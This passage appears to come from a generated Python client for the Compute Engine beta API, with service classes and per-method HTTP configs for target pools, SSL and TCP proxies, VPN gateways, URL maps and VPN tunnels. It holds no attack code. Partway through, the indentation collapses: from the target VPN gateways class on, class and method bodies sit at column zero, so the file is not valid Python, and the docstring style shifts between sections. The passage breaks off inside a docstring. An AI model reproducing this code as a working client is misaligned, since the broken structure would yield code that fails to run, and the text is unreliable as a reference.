  SetBackup.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.setBackup',
      ordered_params=[u'project', u'region', u'targetPool'],
      path_params=[u'project', u'region', u'targetPool'],
      query_params=[u'failoverRatio', u'requestId'],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/setBackup',
      request_field=u'targetReference',
      request_type_name=u'ComputeTargetPoolsSetBackupRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Return the permissions the caller holds on the given resource.

    Args:
      request: (ComputeTargetPoolsTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('TestIamPermissions'), request,
        global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetPools.testIamPermissions',
      ordered_params=[u'project', u'region', u'resource'],
      path_params=[u'project', u'region', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/regions/{region}/targetPools/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeTargetPoolsTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class TargetSslProxiesService(base_api.BaseApiService):
  """Service class exposing the targetSslProxies resource.

  Each public method dispatches one RPC; the matching ``method_config``
  lambda supplies the wire-level metadata (HTTP verb, URL template,
  parameter placement, and message types) consumed by the base service.
  """

  _NAME = u'targetSslProxies'

  def __init__(self, client):
    """Initialize the service; this resource defines no upload configs."""
    super(ComputeBeta.TargetSslProxiesService, self).__init__(client)
    self._upload_configs = {}

  def Delete(self, request, global_params=None):
    """Delete the specified TargetSslProxy resource.

    Args:
      request: (ComputeTargetSslProxiesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetSslProxies.delete',
      ordered_params=[u'project', u'targetSslProxy'],
      path_params=[u'project', u'targetSslProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
      request_field='',
      request_type_name=u'ComputeTargetSslProxiesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Return the specified TargetSslProxy resource.

    A list of available target SSL proxies can be obtained with a list()
    request.

    Args:
      request: (ComputeTargetSslProxiesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetSslProxy) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetSslProxies.get',
      ordered_params=[u'project', u'targetSslProxy'],
      path_params=[u'project', u'targetSslProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
      request_field='',
      request_type_name=u'ComputeTargetSslProxiesGetRequest',
      response_type_name=u'TargetSslProxy',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Create a TargetSslProxy resource in the given project.

    The new resource is built from the data included in the request.

    Args:
      request: (ComputeTargetSslProxiesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetSslProxies.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetSslProxies',
      request_field=u'targetSslProxy',
      request_type_name=u'ComputeTargetSslProxiesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieve the TargetSslProxy resources available in the given project.

    Args:
      request: (ComputeTargetSslProxiesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetSslProxyList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetSslProxies.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/targetSslProxies',
      request_field='',
      request_type_name=u'ComputeTargetSslProxiesListRequest',
      response_type_name=u'TargetSslProxyList',
      supports_download=False,
  )

  def SetBackendService(self, request, global_params=None):
    """Change the BackendService for TargetSslProxy.

    Args:
      request: (ComputeTargetSslProxiesSetBackendServiceRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetBackendService'), request,
        global_params=global_params)

  SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetSslProxies.setBackendService',
      ordered_params=[u'project', u'targetSslProxy'],
      path_params=[u'project', u'targetSslProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setBackendService',
      request_field=u'targetSslProxiesSetBackendServiceRequest',
      request_type_name=u'ComputeTargetSslProxiesSetBackendServiceRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetProxyHeader(self, request, global_params=None):
    """Change the ProxyHeaderType for TargetSslProxy.

    Args:
      request: (ComputeTargetSslProxiesSetProxyHeaderRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetProxyHeader'), request,
        global_params=global_params)

  SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetSslProxies.setProxyHeader',
      ordered_params=[u'project', u'targetSslProxy'],
      path_params=[u'project', u'targetSslProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setProxyHeader',
      request_field=u'targetSslProxiesSetProxyHeaderRequest',
      request_type_name=u'ComputeTargetSslProxiesSetProxyHeaderRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetSslCertificates(self, request, global_params=None):
    """Change SslCertificates for TargetSslProxy.

    Args:
      request: (ComputeTargetSslProxiesSetSslCertificatesRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetSslCertificates'), request,
        global_params=global_params)

  SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetSslProxies.setSslCertificates',
      ordered_params=[u'project', u'targetSslProxy'],
      path_params=[u'project', u'targetSslProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setSslCertificates',
      request_field=u'targetSslProxiesSetSslCertificatesRequest',
      request_type_name=u'ComputeTargetSslProxiesSetSslCertificatesRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetSslPolicy(self, request, global_params=None):
    """Set the SSL policy for TargetSslProxy.

    The SSL policy specifies the server-side support for SSL features. This
    affects connections between clients and the SSL proxy load balancer.
    They do not affect the connection between the load balancer and the
    backends.

    Args:
      request: (ComputeTargetSslProxiesSetSslPolicyRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetSslPolicy'), request,
        global_params=global_params)

  SetSslPolicy.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetSslProxies.setSslPolicy',
      ordered_params=[u'project', u'targetSslProxy'],
      path_params=[u'project', u'targetSslProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setSslPolicy',
      request_field=u'sslPolicyReference',
      request_type_name=u'ComputeTargetSslProxiesSetSslPolicyRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def TestIamPermissions(self, request, global_params=None):
    """Return the permissions the caller holds on the given resource.

    Args:
      request: (ComputeTargetSslProxiesTestIamPermissionsRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TestPermissionsResponse) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('TestIamPermissions'), request,
        global_params=global_params)

  TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetSslProxies.testIamPermissions',
      ordered_params=[u'project', u'resource'],
      path_params=[u'project', u'resource'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetSslProxies/{resource}/testIamPermissions',
      request_field=u'testPermissionsRequest',
      request_type_name=u'ComputeTargetSslProxiesTestIamPermissionsRequest',
      response_type_name=u'TestPermissionsResponse',
      supports_download=False,
  )
class TargetTcpProxiesService(base_api.BaseApiService):
  """Service class exposing the targetTcpProxies resource.

  Each public method dispatches one RPC; the matching ``method_config``
  lambda supplies the wire-level metadata (HTTP verb, URL template,
  parameter placement, and message types) consumed by the base service.
  """

  _NAME = u'targetTcpProxies'

  def __init__(self, client):
    """Initialize the service; this resource defines no upload configs."""
    super(ComputeBeta.TargetTcpProxiesService, self).__init__(client)
    self._upload_configs = {}

  def Delete(self, request, global_params=None):
    """Delete the specified TargetTcpProxy resource.

    Args:
      request: (ComputeTargetTcpProxiesDeleteRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Delete'), request,
        global_params=global_params)

  Delete.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'DELETE',
      method_id=u'compute.targetTcpProxies.delete',
      ordered_params=[u'project', u'targetTcpProxy'],
      path_params=[u'project', u'targetTcpProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
      request_field='',
      request_type_name=u'ComputeTargetTcpProxiesDeleteRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def Get(self, request, global_params=None):
    """Return the specified TargetTcpProxy resource.

    A list of available target TCP proxies can be obtained with a list()
    request.

    Args:
      request: (ComputeTargetTcpProxiesGetRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetTcpProxy) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Get'), request,
        global_params=global_params)

  Get.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetTcpProxies.get',
      ordered_params=[u'project', u'targetTcpProxy'],
      path_params=[u'project', u'targetTcpProxy'],
      query_params=[],
      relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}',
      request_field='',
      request_type_name=u'ComputeTargetTcpProxiesGetRequest',
      response_type_name=u'TargetTcpProxy',
      supports_download=False,
  )

  def Insert(self, request, global_params=None):
    """Create a TargetTcpProxy resource in the given project.

    The new resource is built from the data included in the request.

    Args:
      request: (ComputeTargetTcpProxiesInsertRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('Insert'), request,
        global_params=global_params)

  Insert.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetTcpProxies.insert',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetTcpProxies',
      request_field=u'targetTcpProxy',
      request_type_name=u'ComputeTargetTcpProxiesInsertRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def List(self, request, global_params=None):
    """Retrieve the TargetTcpProxy resources available in the given project.

    Args:
      request: (ComputeTargetTcpProxiesListRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (TargetTcpProxyList) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('List'), request,
        global_params=global_params)

  List.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'GET',
      method_id=u'compute.targetTcpProxies.list',
      ordered_params=[u'project'],
      path_params=[u'project'],
      query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
      relative_path=u'projects/{project}/global/targetTcpProxies',
      request_field='',
      request_type_name=u'ComputeTargetTcpProxiesListRequest',
      response_type_name=u'TargetTcpProxyList',
      supports_download=False,
  )

  def SetBackendService(self, request, global_params=None):
    """Change the BackendService for TargetTcpProxy.

    Args:
      request: (ComputeTargetTcpProxiesSetBackendServiceRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetBackendService'), request,
        global_params=global_params)

  SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetTcpProxies.setBackendService',
      ordered_params=[u'project', u'targetTcpProxy'],
      path_params=[u'project', u'targetTcpProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setBackendService',
      request_field=u'targetTcpProxiesSetBackendServiceRequest',
      request_type_name=u'ComputeTargetTcpProxiesSetBackendServiceRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )

  def SetProxyHeader(self, request, global_params=None):
    """Change the ProxyHeaderType for TargetTcpProxy.

    Args:
      request: (ComputeTargetTcpProxiesSetProxyHeaderRequest) input message
      global_params: (StandardQueryParameters, default: None) global arguments
    Returns:
      (Operation) The response message.
    """
    return self._RunMethod(
        self.GetMethodConfig('SetProxyHeader'), request,
        global_params=global_params)

  SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
      http_method=u'POST',
      method_id=u'compute.targetTcpProxies.setProxyHeader',
      ordered_params=[u'project', u'targetTcpProxy'],
      path_params=[u'project', u'targetTcpProxy'],
      query_params=[u'requestId'],
      relative_path=u'projects/{project}/global/targetTcpProxies/{targetTcpProxy}/setProxyHeader',
      request_field=u'targetTcpProxiesSetProxyHeaderRequest',
      request_type_name=u'ComputeTargetTcpProxiesSetProxyHeaderRequest',
      response_type_name=u'Operation',
      supports_download=False,
  )
class TargetVpnGatewaysService(base_api.BaseApiService):
"""Service class for the targetVpnGateways resource."""
_NAME = u'targetVpnGateways'
def __init__(self, client):
  """Initialize the service; this resource defines no upload configs."""
  super(ComputeBeta.TargetVpnGatewaysService, self).__init__(client)
  self._upload_configs = {}
def AggregatedList(self, request, global_params=None):
  """Retrieve an aggregated list of target VPN gateways.

  Args:
    request: (ComputeTargetVpnGatewaysAggregatedListRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (TargetVpnGatewayAggregatedList) The response message.
  """
  # Look up the wire-level description of this RPC and dispatch it.
  return self._RunMethod(
      self.GetMethodConfig('AggregatedList'), request,
      global_params=global_params)

AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.targetVpnGateways.aggregatedList',
    ordered_params=[u'project'],
    path_params=[u'project'],
    query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
    relative_path=u'projects/{project}/aggregated/targetVpnGateways',
    request_field='',
    request_type_name=u'ComputeTargetVpnGatewaysAggregatedListRequest',
    response_type_name=u'TargetVpnGatewayAggregatedList',
    supports_download=False,
)
def Delete(self, request, global_params=None):
  """Delete the specified target VPN gateway.

  Args:
    request: (ComputeTargetVpnGatewaysDeleteRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (Operation) The response message.
  """
  # Look up the wire-level description of this RPC and dispatch it.
  return self._RunMethod(
      self.GetMethodConfig('Delete'), request,
      global_params=global_params)

Delete.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'DELETE',
    method_id=u'compute.targetVpnGateways.delete',
    ordered_params=[u'project', u'region', u'targetVpnGateway'],
    path_params=[u'project', u'region', u'targetVpnGateway'],
    query_params=[u'requestId'],
    relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
    request_field='',
    request_type_name=u'ComputeTargetVpnGatewaysDeleteRequest',
    response_type_name=u'Operation',
    supports_download=False,
)
def Get(self, request, global_params=None):
  """Return the specified target VPN gateway.

  A list of available target VPN gateways can be obtained with a list()
  request.

  Args:
    request: (ComputeTargetVpnGatewaysGetRequest) input message
    global_params: (StandardQueryParameters, default: None) global arguments
  Returns:
    (TargetVpnGateway) The response message.
  """
  # Look up the wire-level description of this RPC and dispatch it.
  return self._RunMethod(
      self.GetMethodConfig('Get'), request,
      global_params=global_params)

Get.method_config = lambda: base_api.ApiMethodInfo(
    http_method=u'GET',
    method_id=u'compute.targetVpnGateways.get',
    ordered_params=[u'project', u'region', u'targetVpnGateway'],
    path_params=[u'project', u'region', u'targetVpnGateway'],
    query_params=[],
    relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{targetVpnGateway}',
    request_field='',
    request_type_name=u'ComputeTargetVpnGatewaysGetRequest',
    response_type_name=u'TargetVpnGateway',
    supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a target VPN gateway in the specified project and region using the data included in the request.
Args:
request: (ComputeTargetVpnGatewaysInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetVpnGateways.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
request_field=u'targetVpnGateway',
request_type_name=u'ComputeTargetVpnGatewaysInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of target VPN gateways available to the specified project and region.
Args:
request: (ComputeTargetVpnGatewaysListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetVpnGatewayList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetVpnGateways.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways',
request_field='',
request_type_name=u'ComputeTargetVpnGatewaysListRequest',
response_type_name=u'TargetVpnGatewayList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on a TargetVpnGateway. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeTargetVpnGatewaysSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetVpnGateways.setLabels',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{resource}/setLabels',
request_field=u'regionSetLabelsRequest',
request_type_name=u'ComputeTargetVpnGatewaysSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeTargetVpnGatewaysTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetVpnGateways.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetVpnGateways/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeTargetVpnGatewaysTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class UrlMapsService(base_api.BaseApiService):
"""Service class for the urlMaps resource."""
_NAME = u'urlMaps'
def __init__(self, client):
super(ComputeBeta.UrlMapsService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified UrlMap resource.
Args:
request: (ComputeUrlMapsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.urlMaps.delete',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field='',
request_type_name=u'ComputeUrlMapsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified UrlMap resource. Get a list of available URL maps by making a list() request.
Args:
request: (ComputeUrlMapsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMap) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.urlMaps.get',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field='',
request_type_name=u'ComputeUrlMapsGetRequest',
response_type_name=u'UrlMap',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a UrlMap resource in the specified project using the data included in the request.
Args:
request: (ComputeUrlMapsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps',
request_field=u'urlMap',
request_type_name=u'ComputeUrlMapsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def InvalidateCache(self, request, global_params=None):
"""Initiates a cache invalidation operation, invalidating the specified path, scoped to the specified UrlMap.
Args:
request: (ComputeUrlMapsInvalidateCacheRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('InvalidateCache')
return self._RunMethod(
config, request, global_params=global_params)
InvalidateCache.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.invalidateCache',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}/invalidateCache',
request_field=u'cacheInvalidationRule',
request_type_name=u'ComputeUrlMapsInvalidateCacheRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of UrlMap resources available to the specified project.
Args:
request: (ComputeUrlMapsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMapList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.urlMaps.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/urlMaps',
request_field='',
request_type_name=u'ComputeUrlMapsListRequest',
response_type_name=u'UrlMapList',
supports_download=False,
)
def Patch(self, request, global_params=None):
"""Patches the specified UrlMap resource with the data included in the request. This method supports PATCH semantics and uses the JSON merge patch format and processing rules.
Args:
request: (ComputeUrlMapsPatchRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Patch')
return self._RunMethod(
config, request, global_params=global_params)
Patch.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PATCH',
method_id=u'compute.urlMaps.patch',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field=u'urlMapResource',
request_type_name=u'ComputeUrlMapsPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeUrlMapsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeUrlMapsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates the specified UrlMap resource with the data included in the request.
Args:
request: (ComputeUrlMapsUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.urlMaps.update',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}',
request_field=u'urlMapResource',
request_type_name=u'ComputeUrlMapsUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Validate(self, request, global_params=None):
"""Runs static validation for the UrlMap. In particular, the tests of the provided UrlMap will be run. Calling this method does NOT create the UrlMap.
Args:
request: (ComputeUrlMapsValidateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(UrlMapsValidateResponse) The response message.
"""
config = self.GetMethodConfig('Validate')
return self._RunMethod(
config, request, global_params=global_params)
Validate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.urlMaps.validate',
ordered_params=[u'project', u'urlMap'],
path_params=[u'project', u'urlMap'],
query_params=[],
relative_path=u'projects/{project}/global/urlMaps/{urlMap}/validate',
request_field=u'urlMapsValidateRequest',
request_type_name=u'ComputeUrlMapsValidateRequest',
response_type_name=u'UrlMapsValidateResponse',
supports_download=False,
)
class VpnTunnelsService(base_api.BaseApiService):
"""Service class for the vpnTunnels resource."""
_NAME = u'vpnTunnels'
def __init__(self, client):
super(ComputeBeta.VpnTunnelsService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of VPN tunnels.
Args:
request: (ComputeVpnTunnelsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnelAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/vpnTunnels',
request_field='',
request_type_name=u'ComputeVpnTunnelsAggregatedListRequest',
response_type_name=u'VpnTunnelAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified VpnTunnel resource.
Args:
request: (ComputeVpnTunnelsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.vpnTunnels.delete',
ordered_params=[u'project', u'region', u'vpnTunnel'],
path_params=[u'project', u'region', u'vpnTunnel'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
request_field='',
request_type_name=u'ComputeVpnTunnelsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified VpnTunnel resource. Get a list of available VPN tunnels by making a list() request.
Args:
request: (ComputeVpnTunnelsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(VpnTunnel) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.vpnTunnels.get',
ordered_params=[u'project', u'region', u'vpnTunnel'],
path_params=[u'project', u'region', u'vpnTunnel'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/vpnTunnels/{vpnTunnel}',
request_field='',
request_type_name=u'ComputeVpnTunnelsGetRequest',
response_type_name=u'VpnTunnel',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a VpnTunnel resource in the specified project and region using the data included in the request.
Args:
request: (ComputeVpnTunnelsInsertRequest) input message
